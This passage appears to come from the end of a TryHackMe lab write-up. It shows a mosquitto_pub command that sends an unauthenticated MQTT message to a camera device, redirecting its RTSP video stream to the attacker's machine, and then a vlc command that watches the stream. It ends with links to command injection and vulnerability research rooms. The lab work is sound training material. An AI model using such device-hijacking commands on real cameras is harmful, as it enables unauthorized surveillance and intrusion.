    root@ip-10-10-64-204:~# mosquitto_pub -h 10.10.83.111 -m """{"CMD":"10","URL":"RTSP:10.10.64.204:8554/path"}""" -t device/K4OAUPTZUTST1T6LNDYL/cmd
    root@ip-10-10-64-204:~# vlc rtsp://127.0.0.1:8554/path
    ```

    ![vlc](images/2022-12-23-10-10-41.png)

5. If you want to learn more check out the [Command Injection](https://tryhackme.com/room/oscommandinjection) room or the [Vulnerability Research](https://tryhackme.com/module/vulnerability-research) module!
